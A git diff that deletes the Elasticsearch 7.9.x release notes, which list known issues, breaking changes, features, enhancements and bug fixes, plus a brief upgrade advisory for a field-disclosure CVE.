973a562b615..00000000000 --- a/docs/reference/release-notes/7.9.asciidoc +++ /dev/null @@ -1,687 +0,0 @@ -[[release-notes-7.9.3]] -== {es} version 7.9.3 - -Also see <>. 
- -[[known-issues-7.9.3]] -[discrete] -=== Known issues - -* SQL: If a `WHERE` clause contains at least two relational operators joined by -`AND`, of which one is a comparison (`<=`, `<`, `>=`, `>`) and another one is -an inequality (`!=`, `<>`), both against literals or foldable expressions, the -inequality will be ignored. The workaround is to substitute the inequality -with a `NOT IN` operator. -+ -We have fixed this issue in {es} 7.10.1 and later versions. For more details, -see {es-issue}65488[#65488]. - -[[bug-7.9.3]] -[float] -=== Bug fixes - -Allocation:: -* InternalClusterInfoService should not ignore hidden indices {es-pull}62995[#62995] - -Audit:: -* Move RestRequestFilter to core {es-pull}63507[#63507] - -Authentication:: -* Ensure domain_name setting for AD realm is present {es-pull}61983[#61983] (issue: {es-issue}61859[#61859]) - -Authorization:: -* Fix API key role descriptors rewrite bug for upgraded clusters {es-pull}62917[#62917] (issue: {es-issue}62911[#62911]) - -CCR:: -* Retry CCR shard follow task when no seed node left {es-pull}63225[#63225] - -Cluster Coordination:: -* Uniquely associate term with update task during election {es-pull}62212[#62212] (issue: {es-issue}61437[#61437]) - -EQL:: -* Avoid filtering on tiebreakers {es-pull}63215[#63215] (issue: {es-issue}62781[#62781]) -* Fix bug in sequences with any pattern {es-pull}63007[#63007] (issue: {es-issue}62967[#62967]) - -Engine:: -* Fix to actually throttle indexing on getting activated {es-pull}61768[#61768] - -Features/Data streams:: -* Fix querying a data stream name in index field {es-pull}63170[#63170] - -Features/Ingest:: -* Handle error conditions when simulating ingest pipelines with verbosity enabled {es-pull}63327[#63327] (issue: {es-issue}63199[#63199]) -* Make for each processor resistant to field modification {es-pull}62791[#62791] (issue: {es-issue}62790[#62790]) - -Machine Learning:: -* Fix online updates with custom rules referencing filters {es-pull}63057[#63057] (issue: {es-issue}62948[#62948]) -* Reset reindexing progress when data frame analytics job resumes with incomplete reindexing {es-pull}62772[#62772] - -SQL:: -* Fix exception when using CAST on inexact field {es-pull}62943[#62943] (issue: {es-issue}60178[#60178]) - -Search:: -* Async search should retry updates on version conflict {es-pull}63652[#63652] (issue: {es-issue}63213[#63213]) - -Transform:: -* Fix possible NPE if transform task has no node assigned {es-pull}62946[#62946] (issue: {es-issue}62847[#62847]) -* Filter null objects from field caps request {es-pull}62945[#62945] - - - -[[upgrade-7.9.3]] -[float] -=== Upgrades - -Infra/Packaging:: -* Switch bundled JDK back to Oracle JDK {es-pull}63288[#63288] (issue: {es-issue}62709[#62709]) - - -[[release-notes-7.9.2]] -== {es} version 7.9.2 - -Also see <>. - -[[known-issues-7.9.2]] -[discrete] -=== Known issues - -* SQL: If a `WHERE` clause contains at least two relational operators joined by -`AND`, of which one is a comparison (`<=`, `<`, `>=`, `>`) and another one is -an inequality (`!=`, `<>`), both against literals or foldable expressions, the -inequality will be ignored. The workaround is to substitute the inequality -with a `NOT IN` operator. -+ -We have fixed this issue in {es} 7.10.1 and later versions. For more details, -see {es-issue}65488[#65488]. 
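-
-For example, a minimal sketch of the workaround, assuming a hypothetical index
-`my-index-000001` with numeric fields `a` and `b`: instead of combining the
-comparison with an inequality such as `b != 5`, express the inequality as
-`NOT IN`:
-
-[source,console]
-----
-POST /_sql?format=txt
-{
-  "query": "SELECT a, b FROM \"my-index-000001\" WHERE a > 10 AND b NOT IN (5)"
-}
-----
-// TEST[skip:illustrative sketch against a hypothetical index]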
- -[[deprecation-7.9.2]] -[float] -=== Deprecations - -Infra/Plugins:: -* Deprecate xpack.eql.enabled setting and make it a no-op {es-pull}61375[#61375] (issue: {es-issue}54745[#54745]) - -[[enhancement-7.9.2]] -[float] -=== Enhancements - -Mapping:: -* Improve error messages on bad [format] and [null_value] params for date mapper {es-pull}61932[#61932] (issue: {es-issue}61712[#61712]) - -[[bug-7.9.2]] -[float] -=== Bug fixes - -Aggregations:: -* Cardinality request breaker leak {es-pull}62685[#62685] (issue: {es-issue}62439[#62439]) -* Fix bug with terms' min_doc_count {es-pull}62130[#62130] (issue: {es-issue}62084[#62084]) - -Analysis:: -* Fix standard filter BWC check to allow for cacheing bug {es-pull}62649[#62649] (issues: {es-issue}33310[#33310], {es-issue}51092[#51092], {es-issue}62644[#62644]) - -Authentication:: -* Ensure domain_name setting for AD realm is present {es-pull}61859[#61859] -* Update authc failure headers on license change {es-pull}61734[#61734] (issue: {es-issue}56318[#56318]) - -Authorization:: -* Ensure authz operation overrides transient authz headers {es-pull}61621[#61621] - -CCR:: -* CCR should retry on CircuitBreakingException {es-pull}62013[#62013] (issue: {es-issue}55633[#55633]) - -EQL:: -* Create the search request with a list of indices {es-pull}62005[#62005] (issue: {es-issue}60793[#60793]) - -Engine:: -* Allow enabling soft-deletes on restore from snapshot {es-pull}62018[#62018] (issue: {es-issue}61969[#61969]) - -Features/Data streams:: -* Always validate that only a create op is allowed in bulk api for data streams {es-pull}62766[#62766] (issue: {es-issue}62762[#62762]) -* Fix NPE when deleting multiple backing indices on a data stream {es-pull}62274[#62274] (issue: {es-issue}62272[#62272]) -* Fix data stream wildcard resolution bug in eql search api. 
{es-pull}61904[#61904] (issue: {es-issue}60828[#60828]) -* Prohibit the usage of create index api in namespaces managed by data stream templates {es-pull}62527[#62527] - -Features/ILM+SLM:: -* Fix condition in ILM step that cannot be met {es-pull}62377[#62377] - -Features/Ingest:: -* Add Missing NamedWritable Registration for ExecuteEnrichPolicyStatus {es-pull}62364[#62364] - -Features/Java High Level REST Client:: -* Drop assertion that rest client response warnings conform to RFC 7234 {es-pull}61365[#61365] (issues: {es-issue}60889[#60889], {es-issue}61259[#61259]) - -Infra/Packaging:: -* Check glibc version {es-pull}62728[#62728] (issue: {es-issue}62709[#62709]) - -Machine Learning:: -* Add null checks for C++ log handler {es-pull}62238[#62238] -* Persist progress when setting data frame analytics task to failed {es-pull}61782[#61782] -* Fix reporting of peak memory usage in memory stats for data frame analytics {ml-pull}1468[#1468] -* Fix reporting of peak memory usage in model size stats for anomaly detection {ml-pull}1484[#1484] - -Mapping:: -* Allow empty null values for date and IP field mappers {es-pull}62487[#62487] (issues: {es-issue}57666[#57666], {es-issue}62363[#62363]) -* Take resolution into account when parsing date null value {es-pull}61994[#61994] - -Network:: -* Log alloc description after netty processors set {es-pull}62741[#62741] - -SQL:: -* Do not resolve self-referencing aliases {es-pull}62382[#62382] (issue: {es-issue}62296[#62296]) - -Search:: -* Fix disabling `allow_leading_wildcard` {es-pull}62300[#62300] (issues: {es-issue}60959[#60959], {es-issue}62267[#62267]) -* Search memory leak {es-pull}61788[#61788] - -Transform:: -* Disable optimizations when using scripts in group_by {es-pull}60724[#60724] (issue: {es-issue}57332[#57332]) - - - -[[upgrade-7.9.2]] -[float] -=== Upgrades - -Infra/Packaging:: -* Upgrade the bundled JDK to JDK 15 {es-pull}62580[#62580] - -[[release-notes-7.9.1]] -== {es} version 7.9.1 - -Also see <>. - -[[known-issues-7.9.1]] -[discrete] -=== Known issues - -* SQL: If a `WHERE` clause contains at least two relational operators joined by -`AND`, of which one is a comparison (`<=`, `<`, `>=`, `>`) and another one is -an inequality (`!=`, `<>`), both against literals or foldable expressions, the -inequality will be ignored. The workaround is to substitute the inequality -with a `NOT IN` operator. -+ -We have fixed this issue in {es} 7.10.1 and later versions. For more details, -see {es-issue}65488[#65488]. 
- -[[feature-7.9.1]] -[float] -=== New features - -Search:: -* QL: Wildcard field type support {es-pull}58062[#58062] (issues: {es-issue}54184[#54184], {es-issue}58044[#58044]) - - - -[[enhancement-7.9.1]] -[float] -=== Enhancements - -CRUD:: -* Log more information when mappings fail on index creation {es-pull}61577[#61577] - -EQL:: -* Make endsWith function use a wildcard ES query wherever possible {es-pull}61160[#61160] (issue: {es-issue}61154[#61154]) -* Make stringContains function use a wildcard ES query wherever possible {es-pull}61189[#61189] (issue: {es-issue}58922[#58922]) - -Features/Stats:: -* Change severity of negative stats messages from WARN to DEBUG {es-pull}60375[#60375] - -Search:: -* Fix handling of alias filter in SearchService#canMatch {es-pull}59368[#59368] (issue: {es-issue}59367[#59367]) -* QL: Add filtering Query DSL support to IndexResolver {es-pull}60514[#60514] (issue: {es-issue}57358[#57358]) - -Snapshot/Restore:: -* Do not access snapshot repo on dedicated voting-only master node {es-pull}61016[#61016] (issue: {es-issue}59649[#59649]) - - - -[[bug-7.9.1]] -[float] -=== Bug fixes - -Authentication:: -* Call ActionListener.onResponse exactly once {es-pull}61584[#61584] - -Authorization:: -* Relax the index access control check for scroll searches {es-pull}61446[#61446] - -CCR:: -* Relax ShardFollowTasksExecutor validation {es-pull}60054[#60054] (issue: {es-issue}59625[#59625]) -* Set timeout of auto put-follow request to unbounded {es-pull}61679[#61679] (issue: {es-issue}56891[#56891]) -* Set timeout of master node requests on follower to unbounded {es-pull}60070[#60070] (issue: {es-issue}56891[#56891]) - -Cluster Coordination:: -* Restrict testing of legacy discovery to tests {es-pull}61178[#61178] (issue: {es-issue}61177[#61177]) - -EQL:: -* Return sequence join keys in the original type {es-pull}61268[#61268] (issue: {es-issue}59707[#59707]) - -Features/Data streams:: -* "no such index [null]" when indexing into data stream with op_type=index [ISSUE] {es-pull}60581[#60581] -* Data streams: throw ResourceAlreadyExists exception {es-pull}60518[#60518] -* Track backing indices in data streams stats from cluster state {es-pull}59817[#59817] - -Features/ILM+SLM:: -* Fix race in SLM master/cluster state listeners {es-pull}59801[#59801] - -Features/Ingest:: -* Fix handling of final pipelines when destination is changed {es-pull}59522[#59522] (issue: {es-issue}57968[#57968]) -* Fix wrong pipeline name in debug log {es-pull}58817[#58817] (issue: {es-issue}58478[#58478]) -* Fix wrong result when executing bulk requests with and without pipeline {es-pull}60818[#60818] (issue: {es-issue}60437[#60437]) -* Update regex file for es user agent node processor {es-pull}59697[#59697] (issue: {es-issue}59694[#59694]) - -IdentityProvider:: -* Only call listener once (SP template registration) {es-pull}60497[#60497] (issues: {es-issue}54285[#54285], {es-issue}54423[#54423]) - -Machine Learning:: -* Always write prediction_probability and prediction_score for classification inference {es-pull}60335[#60335] -* Ensure .ml-config index is updated before clearing anomaly job's finished_time {es-pull}61064[#61064] (issue: {es-issue}61157[#61157]) -* Ensure annotations index mappings are up to date {es-pull}61107[#61107] (issue: {es-issue}74935[#74935]) -* Handle node closed exception in ML result processing {es-pull}60238[#60238] (issue: {es-issue}60130[#60130]) -* Recover data frame extraction search from latest sort key {es-pull}61544[#61544] - -SQL:: -* Fix NPE on ambiguous GROUP BY 
{es-pull}59370[#59370] (issues: {es-issue}46396[#46396], {es-issue}56489[#56489]) -* Fix SYS COLUMNS schema in ODBC mode {es-pull}59513[#59513] (issue: {es-issue}59506[#59506]) - -Search:: -* Disable sort optimization on search collapsing {es-pull}60838[#60838] -* Search fix: query_string regex searches not working on wildcard fields {es-pull}60959[#60959] (issue: {es-issue}60957[#60957]) - -Snapshot/Restore:: -* Cleanly Handle S3 SDK Exceptions in Request Counting {es-pull}61686[#61686] (issue: {es-issue}61670[#61670]) -* Fix Concurrent Snapshot Create+Delete + Delete Index {es-pull}61770[#61770] (issue: {es-issue}61762[#61762]) - - - -[[upgrade-7.9.1]] -[float] -=== Upgrades - -Infra/Core:: -* Upgrade to Lucene 8.6.2 {es-pull}61688[#61688] (issue: {es-issue}61512[#61512]) - - - -[[release-notes-7.9.0]] -== {es} version 7.9.0 - -Also see <>. - -[float] -[[security-updates-7.9.0]] -=== Security updates - -* A field disclosure flaw was found in {es} when running a scrolling search with -field level security. If a user runs the same query another more privileged user -recently ran, the scrolling search can leak fields that should be hidden. This -could result in an attacker gaining additional permissions against a restricted -index. All versions of {es} before 7.9.0 and 6.8.12 are affected by this flaw. -You must upgrade to {es} version 7.9.0 or 6.8.12 to obtain the fix. -https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-7019[CVE-2020-7019] - -[[known-issues-7.9.0]] -[discrete] -=== Known issues - -* Upgrading to 7.9.0 from an earlier version will result in incorrect mappings -on the {ml} annotations index, and possibly also on the {ml} config index. This -will lead to some pages in the {ml} UI not displaying correctly, and may prevent -{ml-jobs} being created or updated. The best way to avoid this problem if you -read about this known issue before upgrading is to manually update the mappings -on these indices in your old {es} version _before_ upgrading to 7.9.0. If you -find out about the issue after upgrading then reindexing is required to recover. -Full details of the mitigations are in -{ml-docs}/ml-troubleshooting.html#ml-troubleshooting-mappings[Upgrade to 7.9.0 causes incorrect mappings]. - -* Lucene 8.6.0, on which Elasticsearch 7.9.0 is based, - https://issues.apache.org/jira/browse/LUCENE-9478[contains a memory - leak]. This memory leak manifests in Elasticsearch when a single document is - updated repeatedly with a forced refresh. The cluster state storage layer in - Elasticsearch is based on Lucene and does use single-document updates with - forced refreshes, meaning that this memory leak manifests in Elasticsearch under - normal conditions. It also manifests when user-controlled workloads update a - single document in an index repeatedly with a forced refresh. In both cases, - the memory leak is around 500 bytes per update, so it does take some time for - the leak to show any meaningful impact on the system. Symptoms of this memory - leak are the size of the used heap slowly rising over time, requests - eventually being rejected by the real memory circuit breaker, and potentially - out-of-memory errors. A workaround is to restart any nodes exhibiting these - symptoms. We are actively working with the Lucene community to release a - https://github.com/apache/lucene-solr/pull/1779[fix] in Lucene 8.6.2 to - deliver in Elasticsearch 7.9.1 that will address this memory leak. 
-
-* SQL: If a `WHERE` clause contains at least two relational operators joined by
-`AND`, of which one is a comparison (`<=`, `<`, `>=`, `>`) and another one is
-an inequality (`!=`, `<>`), both against literals or foldable expressions, the
-inequality will be ignored. The workaround is to substitute the inequality
-with a `NOT IN` operator.
-+
-We have fixed this issue in {es} 7.10.1 and later versions. For more details,
-see {es-issue}65488[#65488].
-
-[[breaking-7.9.0]]
-[discrete]
-=== Breaking changes
-
-Script Cache::
-* Script cache size and rate limiting are per-context {es-pull}55753[#55753] (issue: {es-issue}50152[#50152])
-
-Field capabilities API::
-* Constant_keyword fields are now described by their family type `keyword` instead of `constant_keyword` {es-pull}58483[#58483] (issue: {es-issue}53175[#53175])
-
-Snapshot restore throttling::
-* Restoring from a snapshot (which is a particular form of recovery) now
-  properly takes recovery throttling into account (i.e. the
-  `indices.recovery.max_bytes_per_sec` setting).
-  The `max_restore_bytes_per_sec` setting also now defaults to
-  unlimited, whereas previously it was set to `40mb`, which is the
-  default that's used for `indices.recovery.max_bytes_per_sec`. This means
-  that no behavioral change will be observed by clusters where the recovery
-  and restore settings had not been adapted from the defaults. {es-pull}58658[#58658]
-
-Thread pool write queue size::
-* The WRITE thread pool default queue size (`thread_pool.write.queue_size`) has
-  been increased from 200 to 10000. A small queue size (200) caused issues when
-  users wanted to send small indexing requests with a high client count.
-  Additional memory-oriented back pressure has been introduced with the
-  `indexing_pressure.memory.limit` setting. This setting configures a limit to
-  the number of bytes allowed to be consumed by outstanding indexing requests.
-  {es-issue}59263[#59263]
-
-Dangling indices::
-* Automatically importing dangling indices is now deprecated, disabled by
-  default, and will be removed in {es} 8.0. See the
-  <>.
-  {es-pull}58176[#58176] {es-pull}58898[#58898] (issue: {es-issue}48366[#48366])
-
-[[breaking-java-7.9.0]]
-[discrete]
-=== Breaking Java changes
-
-Aggregations::
-* Improve cardinality measure used to build aggs {es-pull}56533[#56533] (issue: {es-issue}56487[#56487])
-
-Features/Ingest::
-* Add optional description parameter to ingest processors. 
{es-pull}57906[#57906] (issue: {es-issue}56000[#56000]) - - - -[[feature-7.9.0]] -[discrete] -=== New features - -Aggregations:: -* Add moving percentiles pipeline aggregation {es-pull}55441[#55441] (issue: {es-issue}49452[#49452]) -* Add normalize pipeline aggregation {es-pull}56399[#56399] (issue: {es-issue}51005[#51005]) -* Add variable width histogram aggregation {es-pull}42035[#42035] (issues: {es-issue}9572[#9572], {es-issue}50863[#50863]) -* Add pipeline inference aggregation {es-pull}58193[#58193] -* Speed up time interval arounding around daylight savings time (DST) {es-pull}56371[#56371] (issue: {es-issue}55559[#55559]) - -Geo:: -* Override doc_value parameter in Spatial XPack module {es-pull}53286[#53286] (issue: {es-issue}37206[#37206]) - -Machine Learning:: -* Add update data frame analytics jobs API {es-pull}58302[#58302] (issue: {es-issue}45720[#45720]) -* Introduce model_plot_config.annotations_enabled setting for anomaly detection jobs {es-pull}57539[#57539] (issue: {es-issue}55781[#55781]) -* Report significant changes to anomaly detection models in annotations of the results {ml-pull}1247[#1247], {es-pull}56342[#56342], {es-pull}56417[#56417], {es-pull}57144[#57144], {es-pull}57278[#57278], {es-pull}57539[#57539] - -Mapping:: -* Merge mappings for composable index templates {es-pull}58521[#58521] (issue: {es-issue}53101[#53101]) -* Wildcard field optimised for wildcard queries {es-pull}49993[#49993] (issue: {es-issue}48852[#48852]) - -Search:: -* Allow index filtering in field capabilities API {es-pull}57276[#57276] (issue: {es-issue}56195[#56195]) - - - -[[enhancement-7.9.0]] -[discrete] -=== Enhancements - -Aggregations:: -* Add support for numeric range keys {es-pull}56452[#56452] (issue: {es-issue}56402[#56402]) -* Added standard deviation / variance sampling to extended stats {es-pull}49782[#49782] (issue: {es-issue}49554[#49554]) -* Give significance lookups their own home {es-pull}57903[#57903] -* Increase search.max_buckets to 65,535 {es-pull}57042[#57042] (issue: {es-issue}51731[#51731]) -* Optimize date_histograms across daylight savings time {es-pull}55559[#55559] -* Return clear error message if aggregation type is invalid {es-pull}58255[#58255] (issue: {es-issue}58146[#58146]) -* Save memory on numeric significant terms when not top {es-pull}56789[#56789] (issue: {es-issue}55873[#55873]) -* Save memory when auto_date_histogram is not on top {es-pull}57304[#57304] (issue: {es-issue}56487[#56487]) -* Save memory when date_histogram is not on top {es-pull}56921[#56921] (issues: {es-issue}55873[#55873], {es-issue}56487[#56487]) -* Save memory when histogram agg is not on top {es-pull}57277[#57277] -* Save memory when numeric terms agg is not top {es-pull}55873[#55873] -* Save memory when parent and child are not on top {es-pull}57892[#57892] (issue: {es-issue}55873[#55873]) -* Save memory when rare_terms is not on top {es-pull}57948[#57948] (issue: {es-issue}55873[#55873]) -* Save memory when significant_text is not on top {es-pull}58145[#58145] (issue: {es-issue}55873[#55873]) -* Save memory when string terms are not on top {es-pull}57758[#57758] -* Speed up reducing auto_date_histo with a time zone {es-pull}57933[#57933] (issue: {es-issue}56124[#56124]) -* Speed up rounding in auto_date_histogram {es-pull}56384[#56384] (issue: {es-issue}55559[#55559]) - -Allocation:: -* Account for remaining recovery in disk allocator {es-pull}58029[#58029] - -Analysis:: -* Add max_token_length setting to the CharGroupTokenizer {es-pull}56860[#56860] (issue: 
{es-issue}56676[#56676]) -* Expose discard_compound_token option to kuromoji_tokenizer {es-pull}57421[#57421] -* Support multiple tokens on LHS in stemmer_override rules (#56113) {es-pull}56484[#56484] (issue: {es-issue}56113[#56113]) - -Authentication:: -* Add http proxy support for OIDC realm {es-pull}57039[#57039] (issue: {es-issue}53379[#53379]) -* Improve threadpool usage and error handling for API key validation {es-pull}58090[#58090] (issue: {es-issue}58088[#58088]) -* Support handling LogoutResponse from SAML idP {es-pull}56316[#56316] (issues: {es-issue}40901[#40901], {es-issue}43264[#43264]) - -Authorization:: -* Add cache for application privileges {es-pull}55836[#55836] (issue: {es-issue}54317[#54317]) -* Add monitor and view_index_metadata privileges to built-in `kibana_system` role {es-pull}57755[#57755] -* Improve role cache efficiency for API key roles {es-pull}58156[#58156] (issue: {es-issue}53939[#53939]) - -CCR:: -* Allow follower indices to override leader settings {es-pull}58103[#58103] - -CRUD:: -* Retry failed replication due to transient errors {es-pull}55633[#55633] - -Engine:: -* Don't log on RetentionLeaseSync error handler after an index has been deleted {es-pull}58098[#58098] (issue: {es-issue}57864[#57864]) - -Features/Data streams:: -* Add support for snapshot and restore to data streams {es-pull}57675[#57675] (issues: {es-issue}53100[#53100], {es-issue}57127[#57127]) -* Data stream creation validation allows for prefixed indices {es-pull}57750[#57750] (issue: {es-issue}53100[#53100]) -* Disallow deletion of composable template if in use by data stream {es-pull}57957[#57957] (issue: {es-issue}57004[#57004]) -* Validate alias operations don't target data streams {es-pull}58327[#58327] (issue: {es-issue}53100[#53100]) - -Features/ILM+SLM:: -* Add data stream support to searchable snapshot action {es-pull}57873[#57873] (issue: {es-issue}53100[#53100]) -* Add data stream support to the shrink action {es-pull}57616[#57616] (issue: {es-issue}53100[#53100]) -* Add support for rolling over data streams {es-pull}57295[#57295] (issues: {es-issue}53100[#53100], {es-issue}53488[#53488]) -* Check the managed index is not a data stream write index {es-pull}58239[#58239] (issue: {es-issue}53100[#53100]) - -Features/Indices APIs:: -* Add default composable templates for new indexing strategy {es-pull}57629[#57629] (issue: {es-issue}56709[#56709]) -* Add index block api {es-pull}58094[#58094] -* Add new flag to check whether alias exists on remove {es-pull}58100[#58100] -* Add prefer_v2_templates parameter to reindex {es-pull}56253[#56253] (issue: {es-issue}53101[#53101]) -* Add template simulation API for simulating template composition {es-pull}56842[#56842] (issues: {es-issue}53101[#53101], {es-issue}55686[#55686], {es-issue}56255[#56255], {es-issue}56390[#56390]) - -Features/Ingest:: -* Add ignore_empty_value parameter in set ingest processor {es-pull}57030[#57030] (issue: {es-issue}54783[#54783]) -* Support `if_seq_no` and `if_primary_term` for ingest {es-pull}55430[#55430] (issue: {es-issue}41255[#41255]) - -Features/Java High Level REST Client:: -* Add support for data streams {es-pull}58106[#58106] (issue: {es-issue}53100[#53100]) -* Enable decompression of response within LowLevelRestClient {es-pull}55413[#55413] (issues: {es-issue}24349[#24349], {es-issue}53555[#53555]) - -Features/Java Low Level REST Client:: -* Add isRunning method to RestClient {es-pull}57973[#57973] (issue: {es-issue}42133[#42133]) -* Add RequestConfig support to RequestOptions 
{es-pull}57972[#57972] - -Infra/Circuit Breakers:: -* Enhance real memory circuit breaker with G1 GC {es-pull}58674[#58674] (issue: {es-issue}57202[#57202]) - -Infra/Core:: -* Introduce node.roles setting {es-pull}54998[#54998] - -Infra/Packaging:: -* Remove DEBUG-level logging from actions in Docker {es-pull}57389[#57389] (issues: {es-issue}51198[#51198], {es-issue}51459[#51459]) - -Infra/Plugins:: -* Improved ExtensiblePlugin {es-pull}58234[#58234] - -Infra/Resiliency:: -* Adds resiliency to read-only filesystems #45286 {es-pull}52680[#52680] (issue: {es-issue}45286[#45286]) - -Machine Learning:: -* Accounting for model size when models are not cached. {es-pull}58670[#58670] -* Adds new for_export flag to GET _ml/inference API {es-pull}57351[#57351] -* Adds WKT geometry detection in find_file_structure {es-pull}57014[#57014] (issue: {es-issue}56967[#56967]) -* Calculate cache misses for inference and return in stats {es-pull}58252[#58252] -* Delete auto-generated annotations when job is deleted. {es-pull}58169[#58169] (issue: {es-issue}57976[#57976]) -* Delete auto-generated annotations when model snapshot is reverted {es-pull}58240[#58240] (issue: {es-issue}57982[#57982]) -* Delete expired data by job {es-pull}57337[#57337] -* Introduce Annotation.event field {es-pull}57144[#57144] (issue: {es-issue}55781[#55781]) -* Add support for larger forecasts in memory via max_model_memory setting {ml-pull}1238[#1238], {es-pull}57254[#57254] -* Don't lose precision when saving model state {ml-pull}1274[#1274] -* Parallelize the feature importance calculation for classification and regression over trees {ml-pull}1277[#1277] -* Add an option to do categorization independently for each partition {ml-pull}1293[#1293], {ml-pull}1318[#1318], {ml-pull}1356[#1356], {es-pull}57683[#57683] -* Memory usage is reported during job initialization {ml-pull}1294[#1294] -* More realistic memory estimation for classification and regression means that these analyses will require lower memory limits than before {ml-pull}1298[#1298] -* Checkpoint state to allow efficient failover during coarse parameter search for classification and regression {ml-pull}1300[#1300] -* Improve data access patterns to speed up classification and regression {ml-pull}1312[#1312] -* Performance improvements for classification and regression, particularly running multithreaded {ml-pull}1317[#1317] -* Improve runtime and memory usage training deep trees for classification and regression {ml-pull}1340[#1340] -* Improvement in handling large inference model definitions {ml-pull}1349[#1349] -* Add a peak_model_bytes field to model_size_stats {ml-pull}1389[#1389] - -Mapping:: -* Add regex query support to wildcard field {es-pull}55548[#55548] (issue: {es-issue}54725[#54725]) -* Make `keyword` a family of field types {es-pull}58315[#58315] (issue: {es-issue}53175[#53175]) -* Store parsed mapping settings in IndexSettings {es-pull}57492[#57492] (issue: {es-issue}57395[#57395]) -* Wildcard field - add support for custom null values {es-pull}57047[#57047] - -Network:: -* Make the number of transport threads equal to the number of available CPUs {es-pull}56488[#56488] - -Recovery:: -* Implement dangling indices API {es-pull}50920[#50920] (issue: {es-issue}48366[#48366]) -* Reestablish peer recovery after network errors {es-pull}55274[#55274] -* Sending operations concurrently in peer recovery {es-pull}58018[#58018] (issue: {es-issue}58011[#58011]) - -Reindex:: -* Throw an illegal_argument_exception when max_docs is less than slices 
{es-pull}54901[#54901] (issue: {es-issue}52786[#52786]) - -SQL:: -* Implement TIME_PARSE function for parsing strings into TIME values {es-pull}55223[#55223] (issues: {es-issue}54963[#54963], {es-issue}55095[#55095]) -* Implement TOP as an alternative to LIMIT {es-pull}57428[#57428] (issue: {es-issue}41195[#41195]) -* Implement TRIM function {es-pull}57518[#57518] (issue: {es-issue}41195[#41195]) -* Improve performances of LTRIM/RTRIM {es-pull}57603[#57603] (issue: {es-issue}57594[#57594]) -* Make CASTing string to DATETIME more lenient {es-pull}57451[#57451] -* Redact credentials in connection exceptions {es-pull}58650[#58650] (issue: {es-issue}56474[#56474]) -* Relax parsing of date/time escaped literals {es-pull}58336[#58336] (issue: {es-issue}58262[#58262]) -* Add support for scalars within LIKE/RLIKE {es-pull}56495[#56495] (issue: {es-issue}55058[#55058]) - -Search:: -* Add description to submit and get async search, as well as cancel tasks {es-pull}57745[#57745] -* Add matchBoolPrefix static method in query builders {es-pull}58637[#58637] (issue: {es-issue}58388[#58388]) -* Add range query support to wildcard field {es-pull}57881[#57881] (issue: {es-issue}57816[#57816]) -* Group docIds by segment in FetchPhase to better use LRU cache {es-pull}57273[#57273] -* Improve error handling when decoding async execution ids {es-pull}56285[#56285] -* Specify reason whenever async search gets cancelled {es-pull}57761[#57761] -* Use index sort range query when possible. {es-pull}56657[#56657] (issue: {es-issue}48665[#48665]) - -Security:: -* Add machine learning admin permissions to the kibana_system role {es-pull}58061[#58061] -* Just log 401 stacktraces {es-pull}55774[#55774] - -Snapshot/Restore:: -* Deduplicate Index Metadata in BlobStore {es-pull}50278[#50278] (issues: {es-issue}45736[#45736], {es-issue}46250[#46250], {es-issue}49800[#49800]) -* Default to zero replicas for searchable snapshots {es-pull}57802[#57802] (issue: {es-issue}50999[#50999]) -* Enable fully concurrent snapshot operations {es-pull}56911[#56911] -* Support cloning of searchable snapshot indices {es-pull}56595[#56595] -* Track GET/LIST Azure Storage API calls {es-pull}56773[#56773] -* Track GET/LIST GoogleCloudStorage API calls {es-pull}56585[#56585] -* Track PUT/PUT_BLOCK operations on AzureBlobStore. {es-pull}56936[#56936] -* Track multipart/resumable uploads GCS API calls {es-pull}56821[#56821] -* Track upload requests on S3 repositories {es-pull}56826[#56826] - -Task Management:: -* Add index name to refresh mapping task {es-pull}57598[#57598] -* Cancel task and descendants on channel disconnects {es-pull}56620[#56620] (issues: {es-issue}56327[#56327], {es-issue}56619[#56619]) - -Transform:: -* Add support for terms agg in transforms {es-pull}56696[#56696] -* Adds geotile_grid support in group_by {es-pull}56514[#56514] (issue: {es-issue}56121[#56121]) - - - -[[bug-7.9.0]] -[discrete] -=== Bug fixes - -Aggregations:: -* Fix auto_date_histogram interval {es-pull}56252[#56252] (issue: {es-issue}56116[#56116]) -* Fix bug in faster interval rounding {es-pull}56433[#56433] (issue: {es-issue}56400[#56400]) -* Fix bug in parent and child aggregators when parent field not defined {es-pull}57089[#57089] (issue: {es-issue}42997[#42997]) -* Fix missing null values for std_deviation_bounds in ext. 
stats aggs {es-pull}58000[#58000] - -Allocation:: -* Reword INDEX_READ_ONLY_ALLOW_DELETE_BLOCK message {es-pull}58410[#58410] (issues: {es-issue}42559[#42559], {es-issue}50166[#50166], {es-issue}58376[#58376]) - -Authentication:: -* Map only specific type of OIDC Claims {es-pull}58524[#58524] - -Authorization:: -* Change privilege of enrich stats API to monitor {es-pull}52027[#52027] (issue: {es-issue}51677[#51677]) - -Engine:: -* Fix local translog recovery not updating safe commit in edge case {es-pull}57350[#57350] (issue: {es-issue}57010[#57010]) -* Hide AlreadyClosedException on IndexCommit release {es-pull}57986[#57986] (issue: {es-issue}57797[#57797]) - -Features/ILM+SLM:: -* Normalized prefix for rollover API {es-pull}57271[#57271] (issue: {es-issue}53388[#53388]) - -Features/Indices APIs:: -* Don't allow invalid template combinations {es-pull}56397[#56397] (issues: {es-issue}53101[#53101], {es-issue}56314[#56314]) -* Handle `cluster.max_shards_per_node` in YAML config {es-pull}57234[#57234] (issue: {es-issue}40803[#40803]) - -Features/Ingest:: -* Fix ingest simulate verbose on failure with conditional {es-pull}56478[#56478] (issue: {es-issue}56004[#56004]) - -Geo:: -* Check for degenerated lines when calculating the centroid {es-pull}58027[#58027] (issue: {es-issue}55851[#55851]) -* Fix bug in circuit-breaker check for geoshape grid aggregations {es-pull}57962[#57962] (issue: {es-issue}57847[#57847]) - -Infra/Scripting:: -* Fix source return bug in scripting {es-pull}56831[#56831] (issue: {es-issue}52103[#52103]) - -Machine Learning:: -* Fix wire serialization for flush acknowledgements {es-pull}58413[#58413] -* Make waiting for renormalization optional for internally flushing job {es-pull}58537[#58537] (issue: {es-issue}58395[#58395]) -* Tail the C++ logging pipe before connecting other pipes {es-pull}56632[#56632] (issue: {es-issue}56366[#56366]) -* Fix numerical issues leading to blow up of the model plot bounds {ml-pull}1268[#1268] -* Fix causes for inverted forecast confidence interval bounds {ml-pull}1369[#1369] (issue: {ml-issue}1357[#1357]) -* Restrict growth of max matching string length for categories {ml-pull}1406[#1406] - -Mapping:: -* Wildcard field fix for scripts - changed value type from BytesRef to String {es-pull}58060[#58060] (issue: {es-issue}58044[#58044]) - -SQL:: -* Introduce JDBC option for meta pattern escaping 